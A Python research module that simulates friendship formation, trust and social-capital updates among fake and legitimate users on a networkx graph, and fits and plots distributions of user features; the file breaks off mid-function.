zguo1010/osd
|
e0df06b6586b224c5ac035b5a2a1536a39c3ca45
|
[
"MIT"
] | null | null | null |
social_capital/adv_cred_functions.py
|
zguo1010/osd
|
e0df06b6586b224c5ac035b5a2a1536a39c3ca45
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import scipy
import scipy.stats
import warnings
import math
import time
import random
from numpy.random import choice, randint, seed
from datetime import date
from copy import deepcopy
import os
from multiprocessing import Process, Value, Array
'''change max values'''
def maximum_cap(data, feature='ave_share', thresh=0.05, binnum=10):
    """Clip outliers of *feature* in the frame in-place.

    For each class the cutoff is the histogram edge just past the last bin
    holding at least ``thresh`` of the class's samples; the larger of the
    Fake/Legit cutoffs becomes the cap.
    """
    fake_counts, fake_edges = np.histogram(data.loc[data['label'] == "Fake", :][feature], bins=binnum)
    n_fake = sum(data['label'] == "Fake")
    legit_counts, legit_edges = np.histogram(data.loc[data['label'] == "Legit", :][feature], bins=binnum)
    n_legit = sum(data['label'] == "Legit")
    # Edge index = number of bins whose mass clears the per-class threshold.
    cutoff = max(fake_edges[sum(fake_counts >= n_fake * thresh)],
                 legit_edges[sum(legit_counts >= n_legit * thresh)])
    data.loc[data[feature] > cutoff, feature] = cutoff
    return
'''drawing best fit probability density functions'''
def fitting_distribution(data, feature='verified', dname='FakeLikers', method='SC', drawing=False, binnum=20, out='20'):
    """Fit the best scipy.stats distribution to each class of *feature*.

    Every candidate distribution is fitted to the Fake and the Legit
    samples separately and scored by the sum of squared errors between its
    PDF (scaled to bin mass) and the class histogram.  With ``drawing=True``
    both normalized histograms and their best-fit curves are plotted and
    saved under the dataset's result directory.

    Returns ``(best_name1, best_distribution1, best_params1,
    best_name2, best_distribution2, best_params2)`` for the Fake (1) and
    Legit (2) classes.

    Bug fix: ``out`` previously defaulted to the int ``20``, which raised
    TypeError when concatenated into the save path under ``drawing=True``;
    it now defaults to the string ``'20'``, consistent with fitting_post.
    """
    xmax = max(data[feature])
    xmin = min(data[feature])
    # Fake class: histogram (for SSE scoring) and raw samples (for fitting)
    result1 = np.histogram(data.loc[data['label'] == "Fake", :][feature], bins=binnum, range=(xmin, xmax))
    cnt1 = sum(data['label'] == "Fake")
    x1 = result1[1]
    y1 = data.loc[data['label'] == "Fake", :][feature]
    # Legit class
    result2 = np.histogram(data.loc[data['label'] == "Legit", :][feature], bins=binnum, range=(xmin, xmax))
    cnt2 = sum(data['label'] == "Legit")
    x2 = result2[1]
    y2 = data.loc[data['label'] == "Legit", :][feature]
    # Shared y-axis limit: tallest normalized bar rounded up to the next 0.1
    height = max(np.max(result1[0]) / cnt1, np.max(result2[0]) / cnt2)
    tmp = round(height * 10) / 10
    if tmp < height:
        height = tmp + 0.1
    else:
        height = tmp
    width = result1[1][1] - result1[1][0]
    # Candidate scipy.stats distribution names (levy/levy_stable excluded:
    # they are extremely slow to fit).
    dist_names = ['alpha', 'anglit', 'arcsine', 'beta', 'betaprime', 'binom', 'bradford', 'burr', 'cauchy', 'chi',
                  'chi2', 'cosine',
                  'dgamma', 'dweibull', 'erlang', 'expon', 'exponnorm', 'exponweib', 'exponpow', 'f', 'fatiguelife',
                  'fisk',
                  'foldcauchy', 'foldnorm', 'genlogistic', 'genpareto', 'gennorm', 'genexpon',
                  'genextreme', 'gausshyper', 'gamma', 'gengamma', 'genhalflogistic', 'gilbrat', 'gompertz', 'gumbel_r',
                  'gumbel_l', 'halfcauchy', 'halfnorm', 'halfgennorm', 'hypsecant', 'invgamma', 'invgauss',
                  'halflogistic',
                  'invweibull', 'johnsonsb', 'johnsonsu', 'ksone', 'kstwobign', 'laplace', 'levy_l',
                  # 'levy','levy_stable',
                  'logistic', 'loggamma', 'loglaplace', 'lognorm', 'lomax', 'maxwell', 'mielke', 'nakagami', 'ncx2',
                  'ncf',
                  'nct', 'norm', 'pareto', 'pearson3', 'powerlaw', 'powerlognorm', 'powernorm', 'rdist', 'reciprocal',
                  'rayleigh', 'rice', 'recipinvgauss', 'semicircular', 't', 'triang', 'truncexpon', 'truncnorm',
                  'tukeylambda',
                  'uniform', 'vonmises', 'vonmises_line', 'wald', 'weibull_min', 'weibull_max', 'wrapcauchy']
    # Best-fit probability model for the Fake class
    best_name1 = 'expon'
    best_distribution1 = getattr(scipy.stats, best_name1)
    best_sse1 = np.inf
    best_params1 = (0.0, 1.0)
    for dist_name in dist_names:
        try:
            with warnings.catch_warnings():
                warnings.filterwarnings('ignore')
                dist = getattr(scipy.stats, dist_name)
                params = dist.fit(y1)
                # Separate shape args from loc/scale
                arg = params[:-2]
                loc = params[-2]
                scale = params[-1]
                # SSE between fitted PDF (scaled to bin mass) and histogram
                pdf = dist.pdf(x1[:-1], loc=loc, scale=scale, *arg) * width
                sse = np.sum(np.power(result1[0] / cnt1 - pdf, 2.0))
                if best_sse1 > sse > 0:
                    best_distribution1 = dist
                    best_params1 = params
                    best_sse1 = sse
                    best_name1 = dist_name
        except Exception:
            # Some distributions cannot be fitted to this data; skip them.
            pass
    if drawing:
        plt.figure(figsize=(7, 5))
        plt.ylim(0, height)
        width = result1[1][1] - result1[1][0]
        # Curve resolution scales with the data range
        if x1[-1] > 40:
            x1_list = np.arange(x1[-1])
        elif x1[-1] > 5:
            x1_list = np.arange(0, x1[-1], 0.2)
        elif x1[-1] > 0.5:
            x1_list = np.arange(0, x1[-1], 0.05)
        else:
            x1_list = np.arange(0, x1[-1], 0.005)
        pdf_fitted1 = best_distribution1.pdf(x1_list, *best_params1[:-2], loc=best_params1[-2],
                                             scale=best_params1[-1]) * width
        # Normalized histogram plus best-fit curve for the Fake class
        plt.bar(x1[:-1], result1[0] / cnt1, width=width * 0.75, color='r', alpha=0.1, label='Attackers')
        plt.plot(x1_list, pdf_fitted1, label='Attackers: ' + best_name1, color='r')
    # Best-fit probability model for the Legit class
    best_name2 = 'expon'
    best_distribution2 = getattr(scipy.stats, best_name2)
    best_sse2 = np.inf
    best_params2 = (0.0, 1.0)
    for dist_name in dist_names:
        try:
            with warnings.catch_warnings():
                warnings.filterwarnings('ignore')
                dist = getattr(scipy.stats, dist_name)
                params = dist.fit(y2)
                arg = params[:-2]
                loc = params[-2]
                scale = params[-1]
                pdf = dist.pdf(x2[:-1], loc=loc, scale=scale, *arg) * width
                sse = np.sum(np.power(result2[0] / cnt2 - pdf, 2.0))
                if best_sse2 > sse > 0:
                    best_distribution2 = dist
                    best_params2 = params
                    best_sse2 = sse
                    best_name2 = dist_name
        except Exception:
            pass
    if drawing:
        if x2[-1] > 40:
            x2_list = np.arange(x2[-1])
        elif x2[-1] > 5:
            x2_list = np.arange(0, x2[-1], 0.2)
        elif x2[-1] > 0.5:
            x2_list = np.arange(0, x2[-1], 0.05)
        else:
            x2_list = np.arange(0, x2[-1], 0.005)
        pdf_fitted2 = best_distribution2.pdf(x2_list, *best_params2[:-2], loc=best_params2[-2],
                                             scale=best_params2[-1]) * width
        # Normalized histogram plus best-fit curve for the Legit class
        plt.bar(x2[:-1], result2[0] / cnt2, width=width * 0.75, color='b', alpha=0.1, label='Legit Users')
        plt.plot(x2_list, pdf_fitted2, label='Legit: ' + best_name2, color='b', linestyle='--')
        if feature == 'between':
            plt.xlabel('Betweenness: FDS-' + method, fontsize=20)
            # plt.xscale('log')
        else:
            plt.xlabel('Social capital dimension: ' + feature, fontsize=20)
        plt.ylabel('Probability', fontsize=20)
        plt.tick_params(axis='both', labelsize=16)
        if dname == '1ks10kn' and feature == 'human':
            plt.legend(fontsize=18, loc='upper left', framealpha=0.3)
        else:
            plt.legend(fontsize=18)
        # Dataset-specific figure margins and output directory
        if dname == 'FakeLikers':
            plt.gcf().subplots_adjust(left=0.11)
            plt.gcf().subplots_adjust(top=1.0)
            plt.gcf().subplots_adjust(right=1.0)
            plt.savefig('resultliker/' + out + '/' + feature + '_' + method + '.png', dpi=300)
        if dname == 'Cresci15':
            plt.gcf().subplots_adjust(left=0.13)
            plt.gcf().subplots_adjust(top=0.98)
            plt.gcf().subplots_adjust(right=1.0)
            plt.savefig('resultcres/' + out + '/' + feature + '_' + method + '.png', dpi=300)
        if dname == 'INT':
            plt.gcf().subplots_adjust(left=0.11)
            plt.gcf().subplots_adjust(top=1.0)
            plt.gcf().subplots_adjust(right=1.0)
            plt.savefig('resultint/' + out + '/' + feature + '_' + method + '.png', dpi=300)
        elif dname == '1ks10kn':
            plt.gcf().subplots_adjust(left=0.13)
            plt.gcf().subplots_adjust(top=0.98)
            plt.gcf().subplots_adjust(right=1.0)
            plt.savefig('result1ks/' + out + '/' + feature + '_' + method + '.png', dpi=300)
        plt.clf()
    return best_name1, best_distribution1, best_params1, best_name2, best_distribution2, best_params2
'''Return list of nodes need friends'''
def friend_pending(G):
    """Return the nodes whose 'full' flag is explicitly False (still open)."""
    # Deliberately `== False` so a missing/None attribute is NOT treated as pending.
    return [node for node, is_full in G.nodes(data='full') if is_full == False]
'''Return Graph capital data to likers for plotting'''
def capital_return(capital, G, feature='structural'):
    """Copy node attribute *feature* from graph G into the *capital* frame in-place."""
    for node in G.nodes():
        capital.at[node, feature] = G.nodes[node][feature]
'''Show how many nodes reached friends limit'''
def friend_full(G):
    """Return the fraction of nodes whose friend list is saturated."""
    # `== True` mirrors the pending check: only an explicit True counts.
    saturated = sum(1 for _, is_full in G.nodes(data='full') if is_full == True)
    return saturated / G.order()
# find best fit probability density functions
def fitting_post(data, dname, feature='friends', method='SC', binnum=20, out='20'):
    """Plot normalized Fake-vs-Legit histograms of *feature* and save the figure.

    The output path is chosen by *dname* (one result directory per dataset);
    an unknown *dname* still clears the current figure but saves nothing.

    Cleanup: removed dead locals from the original (unused raw samples,
    the unused common-height computation, and an unused 86-entry
    distribution-name list) — no behavioral change.
    """
    xmax = max(data[feature])
    xmin = min(data[feature])
    # Fake class histogram over the full data range
    result1 = np.histogram(data.loc[data['label'] == "Fake", :][feature], bins=binnum, range=(xmin, xmax))
    cnt1 = sum(data['label'] == "Fake")
    x1 = result1[1]
    # Legit class histogram over the same range
    result2 = np.histogram(data.loc[data['label'] == "Legit", :][feature], bins=binnum, range=(xmin, xmax))
    cnt2 = sum(data['label'] == "Legit")
    x2 = result2[1]
    width = result1[1][1] - result1[1][0]
    # Both histograms normalized by class size, drawn without fitted PMFs
    plt.bar(x1[:-1], result1[0] / cnt1, width=width * 0.75, color='r', alpha=0.1, label='Fake')
    plt.bar(x2[:-1], result2[0] / cnt2, width=width * 0.75, color='b', alpha=0.1, label='Legit')
    plt.xlabel(dname + ' Degrees: ', fontsize=18)
    plt.ylabel('Probability', fontsize=18)
    plt.legend(loc='upper right')
    # One result directory per dataset
    if dname == 'FakeLikers':
        plt.savefig('resultliker/' + out + '/' + feature + '_' + method + '.png')
    elif dname == 'Cresci15':
        plt.savefig('resultcres/' + out + '/' + feature + '_' + method + '.png')
    elif dname == 'INT':
        plt.savefig('resultint/' + out + '/' + feature + '_' + method + '.png')
    elif dname == '1ks10kn':
        plt.savefig('result1ks/' + out + '/' + feature + '_' + method + '.png')
    plt.clf()
# -----------
'''Adding likers data to Graph'''
def node_attributes(likers, G, feature):
    """Write the *feature* column of *likers* onto the matching graph nodes."""
    for node, value in zip(likers.index, likers[feature].values):
        # Friend counts are stored as ints; every other feature is kept as-is.
        G.nodes[node][feature] = int(value) if feature == 'friends' else value
'''Adding likers data to Graph'''
def node_attributes_edges(likers, G, dname):
    """Seed each node's 'edge_interaction' as ceil(friends / 80).

    *dname* is accepted for interface compatibility but not used.
    """
    for node, friends in zip(likers.index, likers['friends'].values):
        G.nodes[node]['edge_interaction'] = math.ceil(friends / 80)
'''Adding social capital data to Graph'''
def node_attributes_sc(likers, G):
    """Aggregate each node's static social capital into a 'capital' attribute.

    capital = human + cognitive + relational, read from attributes already
    stored on the graph node (one node per row of *likers*).
    """
    for node in likers.index:
        attrs = G.nodes[node]
        attrs['capital'] = attrs['human'] + attrs['cognitive'] + attrs['relational']
'''Initialize graph nodes with attributes'''
def initialization_graph(likers, capital, n, dname):
    """Build an n-node edgeless graph and seed every node attribute.

    Attributes come from two frames: *likers* (profile data such as friend
    counts and labels) and *capital* (social-capital dimensions and
    behavioral seeds).  Returns the initialized graph.
    """
    G = nx.empty_graph(n)
    # Friendship bookkeeping: current edge count, and whether the cap is reached
    nx.set_node_attributes(G, 0, 'edges')
    nx.set_node_attributes(G, False, 'full')
    # Fill features from likers
    node_attributes(likers, G, 'friends')
    node_attributes(likers, G, 'label')
    node_attributes_edges(likers, G, dname)
    # Fill in static social capital
    node_attributes(capital, G, 'human')
    node_attributes(capital, G, 'cognitive')
    node_attributes(capital, G, 'relational')
    node_attributes_sc(capital, G)  # aggregated 'capital' = human+cognitive+relational
    # Dynamic social-capital dimensions, recomputed during simulation
    nx.set_node_attributes(G, 0, 'STC')
    nx.set_node_attributes(G, 0, 'CC')
    nx.set_node_attributes(G, 0, 'RC')
    nx.set_node_attributes(G, 0, 'SC')
    # Behavioral seeds (probabilities driving the interaction simulation)
    node_attributes(capital, G, 'feeding')
    node_attributes(capital, G, 'posting')
    node_attributes(capital, G, 'feedback')
    node_attributes(capital, G, 'inviting')
    # Credibility judgement inputs
    nx.set_node_attributes(G, 1, 'experience')  # normal user starts at 1
    node_attributes(capital, G, 'competence')  # normal user
    node_attributes(capital, G, 'deception')  # attacker + compromised user
    # Trust bookkeeping: per-node running max of edge feed/feedback counters
    nx.set_node_attributes(G, 0, 'trust')
    nx.set_node_attributes(G, 1, 'fmax')
    nx.set_node_attributes(G, 1, 'bmax')
    # Attack-model state: per-attack infection status and compromise counter
    nx.set_node_attributes(G, '', 'phish')
    nx.set_node_attributes(G, 0, 'compromise')
    print(G.nodes[0])  # sanity check: show one fully initialized node
    return G
'''Adding an new edge'''
def new_friend(G, u, v):
    """Create the friendship edge u-v and update both endpoints' counters.

    A fresh edge starts with one feeding and one feedback interaction; each
    endpoint's edge count is bumped and its 'full' flag set once it reaches
    its friend limit.
    """
    G.add_edge(u, v, f=1, b=1)
    for node in (u, v):
        G.nodes[node]['edges'] = G.nodes[node]['edges'] + 1
        if G.nodes[node]['edges'] >= G.nodes[node]['friends']:
            G.nodes[node]['full'] = True
'''Update social capital and structural capital'''
def social_capital_update(G, i):
    """Recompute node i's trust-weighted social-capital dimensions in place.

    Each neighbor's static capital (human/cognitive/relational) is weighted
    by the average of the edge's normalized feeding and feedback counts,
    then averaged over all neighbors.  SC is the mean of the three dynamic
    dimensions.

    Fix: an isolated node previously raised ZeroDivisionError; its
    dimensions are now set to 0.  Also removed the unused `tu` accumulator.
    """
    neighbors = list(G.neighbors(i))
    if not neighbors:
        # No neighbors to draw capital from.
        G.nodes[i]['STC'] = 0
        G.nodes[i]['CC'] = 0
        G.nodes[i]['RC'] = 0
        G.nodes[i]['SC'] = 0
        return
    stc, cc, rc = 0, 0, 0
    for j in neighbors:
        # Edge trust: feeding + feedback counts, each normalized by i's maxima.
        trust = G.edges[i, j]['f'] / G.nodes[i]['fmax'] + G.edges[i, j]['b'] / G.nodes[i]['bmax']
        stc = stc + G.nodes[j]['human'] * trust / 2
        cc = cc + G.nodes[j]['cognitive'] * trust / 2
        rc = rc + G.nodes[j]['relational'] * trust / 2
    neighbor_len = len(neighbors)
    G.nodes[i]['STC'] = stc / neighbor_len
    G.nodes[i]['CC'] = cc / neighbor_len
    G.nodes[i]['RC'] = rc / neighbor_len
    G.nodes[i]['SC'] = (G.nodes[i]['CC'] + G.nodes[i]['RC'] + G.nodes[i]['STC']) / 3
'''Update social capital and structural capital'''
def social_capital_trust_update(G, i):
    """Recompute node i's social-capital dimensions and its mean trust in place.

    Same capital computation as social_capital_update, plus 'trust': the
    average over neighbors of the edge trust as seen from the neighbor's
    side (normalized by the neighbor's fmax/bmax).

    Fix: an isolated node previously raised ZeroDivisionError; all its
    dynamic values are now set to 0.
    """
    neighbors = list(G.neighbors(i))
    if not neighbors:
        # No neighbors to draw capital or trust from.
        G.nodes[i]['STC'] = 0
        G.nodes[i]['CC'] = 0
        G.nodes[i]['RC'] = 0
        G.nodes[i]['SC'] = 0
        G.nodes[i]['trust'] = 0
        return
    stc, cc, rc, tu = 0, 0, 0, 0
    for j in neighbors:
        # Trust i places in the edge: counts normalized by i's maxima.
        trust = G.edges[i, j]['f'] / G.nodes[i]['fmax'] + G.edges[i, j]['b'] / G.nodes[i]['bmax']
        stc = stc + G.nodes[j]['human'] * trust / 2
        cc = cc + G.nodes[j]['cognitive'] * trust / 2
        rc = rc + G.nodes[j]['relational'] * trust / 2
        # Trust j places in the edge: counts normalized by j's maxima.
        trustj = G.edges[i, j]['f'] / G.nodes[j]['fmax'] + G.edges[i, j]['b'] / G.nodes[j]['bmax']
        tu = tu + trustj / 2
    neighbor_len = len(neighbors)
    G.nodes[i]['STC'] = stc / neighbor_len
    G.nodes[i]['CC'] = cc / neighbor_len
    G.nodes[i]['RC'] = rc / neighbor_len
    G.nodes[i]['SC'] = (G.nodes[i]['CC'] + G.nodes[i]['RC'] + G.nodes[i]['STC']) / 3
    G.nodes[i]['trust'] = tu / neighbor_len
'''Each user initial 5 friends'''
def initial_friend_SC(G, feature, run, dname):
    """Seed the network with five rounds of social-capital-ranked befriending.

    Each round, every pending node j befriends the not-yet-full candidate
    with the highest value of *feature*; after each round one step of
    feeding/feedback interaction is simulated to grow edge trust counters.
    Finally every node's dynamic capital and trust are recomputed.
    ``run`` and ``dname`` are currently unused.  Returns G (mutated in place).
    """
    rnd = int(1000*random.random())
    print("initial SC seed:", rnd)
    random.seed(rnd)
    pending = friend_pending(G)
    random.shuffle(pending)
    full_nodes = set(G.nodes()) - set(pending)  # NOTE(review): computed but never used
    for i in range(5):
        for j in pending:
            # Skip nodes already at 40% of their friend budget or with >6 edges
            if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6:  #leave space for very small number of friends
                continue
            # find all possible candidates k (pending, not j, not already a friend)
            friend_j = list(G.neighbors(j))
            list_k = pending[:]  #deepcopy
            list_k.remove(j)
            list_k = list(set(list_k) - set(friend_j))
            if len(list_k) == 0:
                G.nodes[j]['full'] = True
                continue
            # collect all k to node_list, scored by the chosen capital feature
            node_list0 = {}
            for k in list_k:
                if G.nodes[k]['full'] == False and G.nodes[k]['edges'] < 7:
                    node_list0[k] = G.nodes[k][feature]
            if len(node_list0) == 0:
                G.nodes[j]['full'] = True
                continue
            node_list = {}
            for k in node_list0.keys():
                node_list[k] = node_list0[k]
            if len(node_list) == 0:
                continue
            # rank node_list ascending by score and pick the top candidate
            node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
            flag = 0
            ranked = list(node_list.keys())  # ascending
            # select top 1 value, falling back down the ranking if it is full
            while flag == 0:
                if len(node_list) == 0 or G.nodes[j]['full'] == True:
                    break
                ranked = list(node_list.keys())  # ascending
                f = ranked[-1]
                if G.nodes[f]['full'] == False and G.nodes[f]['edges'] < 7:
                    new_friend(G, j, f)
                    flag = 1
                del node_list[f]
        # simulate positive interaction: feeders share to all friends,
        # friends may feed back; per-node fmax/bmax track the largest counters
        for j in list(G.nodes()):
            if G.nodes[j]['feeding'] >= random.random():  # if feeding, share to all friends
                for fb in list(G.neighbors(j)):  # update feeding count on each edge
                    G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                    if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                        G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                    if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                        G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                    if G.nodes[fb]['feedback'] >= random.random():  # probabilistic feedback
                        G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                        if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                            G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                        if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                            G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
        pending = friend_pending(G)
        random.shuffle(pending)
    # after 5 rounds: refresh dynamic social capital and trust for every node
    for i in list(G.nodes()):  # update sc and trust values
        social_capital_trust_update(G, i)
    print(G.size())
    return G
'''Each user initial 5 friends'''
def initial_friend_TR(G, run, dname):
    """Seed the network with five rounds of trust-ranked befriending.

    Same loop as initial_friend_SC, but candidates are ranked by their
    behavioral trust seed (feeding + feedback) instead of a capital feature,
    and no hard degree cap of 7 is applied to candidates.
    ``run`` and ``dname`` are currently unused.  Returns G (mutated in place).
    """
    rnd = int(1000*random.random())
    print("initial TR seed:", rnd)
    random.seed(rnd)
    pending = friend_pending(G)
    random.shuffle(pending)
    full_nodes = set(G.nodes()) - set(pending)  # NOTE(review): computed but never used
    for i in range(5):
        for j in pending:
            # Skip nodes already at 40% of their friend budget or with >6 edges
            if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6:  #leave space for very small number of friends
                continue
            # find all possible candidates k
            friend_j = list(G.neighbors(j))
            list_k = pending[:]  #deepcopy
            list_k.remove(j)
            list_k = list(set(list_k) - set(friend_j))
            if len(list_k) == 0:
                G.nodes[j]['full'] = True
                continue
            # collect candidates, scored by feeding + feedback propensity
            node_list0 = {}
            for k in list_k:
                if G.nodes[k]['full'] == False:
                    node_list0[k] = G.nodes[k]['feeding'] + G.nodes[k]['feedback']
            if len(node_list0) == 0:
                G.nodes[j]['full'] = True
                continue
            node_list = {}
            for k in node_list0.keys():
                node_list[k] = node_list0[k]
            if len(node_list) == 0:
                continue
            # rank ascending and pick the top candidate
            node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
            flag = 0
            ranked = list(node_list.keys())  # ascending
            # select top 1 value, falling back down the ranking if it is full
            while flag == 0:
                if len(node_list) == 0 or G.nodes[j]['full'] == True:
                    break
                ranked = list(node_list.keys())  # ascending
                f = ranked[-1]
                if G.nodes[f]['full'] == False:
                    new_friend(G, j, f)
                    flag = 1
                del node_list[f]
        # simulate positive interaction (same scheme as initial_friend_SC)
        for j in list(G.nodes()):
            if G.nodes[j]['feeding'] >= random.random():  # if feeding, share to all friends
                for fb in list(G.neighbors(j)):  # update feeding count on each edge
                    G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                    if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                        G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                    if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                        G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                    if G.nodes[fb]['feedback'] >= random.random():  # probabilistic feedback
                        G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                        if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                            G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                        if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                            G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
        pending = friend_pending(G)
        random.shuffle(pending)
    # after 5 rounds: refresh dynamic social capital and trust for every node
    for i in list(G.nodes()):  # update sc and trust values
        social_capital_trust_update(G, i)
    print(G.size())
    return G
'''Each user initial 5 friends'''
def initial_friend_SA(G, run, dname):
    """Seed the network with five rounds of similarity-ranked befriending.

    Candidate score is the cosine similarity between the two nodes'
    (human, cognitive, relational) capital vectors, precomputed in an
    upper-triangular matrix.  ``run`` and ``dname`` are currently unused.
    Returns G (mutated in place).
    """
    rnd = int(1000*random.random())
    print("initial SA seed:", rnd)
    random.seed(rnd)
    # adjacency matrix caching pairwise cosine similarity (upper triangle only)
    size = max(G.nodes()) + 1
    product_matrix = np.zeros((size, size))
    for x in G.nodes():
        dot_x = [G.nodes[x]['human'], G.nodes[x]['cognitive'], G.nodes[x]['relational']]
        for y in G.nodes():
            if y > x:
                dot_y = [G.nodes[y]['human'], G.nodes[y]['cognitive'], G.nodes[y]['relational']]
                mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
                product_matrix[x][y] = mut
    pending = friend_pending(G)
    random.shuffle(pending)
    full_nodes = set(G.nodes()) - set(pending)  # NOTE(review): computed but never used
    for i in range(5):
        for j in pending:
            # Skip nodes already at 40% of their friend budget or with >6 edges
            if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6:  #leave space for very small number of friends
                continue
            # find all possible candidates k
            friend_j = list(G.neighbors(j))
            list_k = pending[:]  #deepcopy
            list_k.remove(j)
            list_k = list(set(list_k) - set(friend_j))
            if len(list_k) == 0:
                G.nodes[j]['full'] = True
                continue
            # collect candidates, scored by precomputed cosine similarity
            node_list0 = {}
            for k in list_k:
                if G.nodes[k]['full'] == False:
                    node_list0[k] = product_matrix[min(j, k)][max(j, k)]
            if len(node_list0) == 0:
                G.nodes[j]['full'] = True
                continue
            node_list = {}
            for k in node_list0.keys():
                node_list[k] = node_list0[k]
            if len(node_list) == 0:
                continue
            # rank ascending and pick the top candidate
            node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
            flag = 0
            ranked = list(node_list.keys())  # ascending
            # select top 1 value, falling back down the ranking if it is full
            while flag == 0:
                if len(node_list) == 0 or G.nodes[j]['full'] == True:
                    break
                ranked = list(node_list.keys())  # ascending
                f = ranked[-1]
                # NOTE(review): the degree check here reads j's edges, while the
                # analogous check in initial_friend_SC reads f's — possibly a
                # copy-paste slip; confirm intended behavior before changing.
                if G.nodes[f]['full'] == False and G.nodes[j]['edges'] < 7:
                    new_friend(G, j, f)
                    flag = 1
                del node_list[f]
        # simulate positive interaction (same scheme as initial_friend_SC)
        for j in list(G.nodes()):
            if G.nodes[j]['feeding'] >= random.random():  # if feeding, share to all friends
                for fb in list(G.neighbors(j)):  # update feeding count on each edge
                    G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                    if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                        G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                    if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                        G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                    if G.nodes[fb]['feedback'] >= random.random():  # probabilistic feedback
                        G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
                        if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
                            G.nodes[j]['bmax'] = G.edges[j, fb]['b']
                        if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
                            G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
        pending = friend_pending(G)
        random.shuffle(pending)
    # after 5 rounds: refresh dynamic social capital and trust for every node
    for i in list(G.nodes()):  # update sc and trust values
        social_capital_trust_update(G, i)
    print(G.size())
    return G
'''Each user initial 5 friends'''
def initial_friend_TP(G, topics, run, dname):
    """Seed the network with five rounds of topic-similarity-ranked befriending.

    Candidate score is the cosine similarity between the two nodes' topic
    vectors (rows of *topics*), precomputed in an upper-triangular matrix.
    ``run`` and ``dname`` are currently unused.  Returns G (mutated in place).
    """
    rnd = int(1000*random.random())
    print("initial TP seed:", rnd)
    random.seed(rnd)
    # adjacency matrix caching pairwise cosine similarity (upper triangle only)
    size = max(G.nodes()) + 1
    product_matrix = np.zeros((size, size))
    for x in G.nodes():
        dot_x = topics.loc[x]
        for y in G.nodes():
            if y > x:
                dot_y = topics.loc[y]
                mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
                product_matrix[x][y] = mut
    pending = friend_pending(G)
    random.shuffle(pending)
    full_nodes = set(G.nodes()) - set(pending)  # NOTE(review): computed but never used
    for i in range(5):
        for j in pending:
            # Skip nodes already at 40% of their friend budget or with >6 edges
            if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6:  #leave space for very small number of friends
                continue
            # find all possible candidates k
            friend_j = list(G.neighbors(j))
            list_k = pending[:]  #deepcopy
            list_k.remove(j)
            list_k = list(set(list_k) - set(friend_j))
            if len(list_k) == 0:
                G.nodes[j]['full'] = True
                continue
            # collect candidates, scored by precomputed topic similarity
            node_list0 = {}
            for k in list_k:
                # NOTE(review): the degree check here reads j's edges, while the
                # analogous check in initial_friend_SC reads k's — possibly a
                # copy-paste slip; confirm intended behavior before changing.
                if G.nodes[k]['full'] == False and G.nodes[j]['edges'] < 7:
                    node_list0[k] = product_matrix[min(j, k)][max(j, k)]
            if len(node_list0) == 0:
                G.nodes[j]['full'] = True
                continue
            node_list = {}
            for k in node_list0.keys():
                node_list[k] = node_list0[k]
            if len(node_list) == 0:
                continue
            # rank ascending and pick the top candidate
            node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
            flag = 0
            ranked = list(node_list.keys())  # ascending
            # select top 1 value, falling back down the ranking if it is full
            while flag == 0:
                if len(node_list) == 0 or G.nodes[j]['full'] == True:
                    break
                ranked = list(node_list.keys())  # ascending
                f = ranked[-1]
                if G.nodes[f]['full'] == False:
                    new_friend(G, j, f)
                    flag = 1
                del node_list[f]
        # simulate positive interaction (same scheme as initial_friend_SC)
        for j in list(G.nodes()):
            if G.nodes[j]['feeding'] >= random.random():  # if feeding, share to all friends
                for fb in list(G.neighbors(j)):  # update feeding count on each edge
                    G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
                    if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
                        G.nodes[j]['fmax'] = G.edges[j, fb]['f']
                    if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
                        G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
                    if G.nodes[fb]['feedback'] >= random.random():  # probabilistic feedback
                        G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
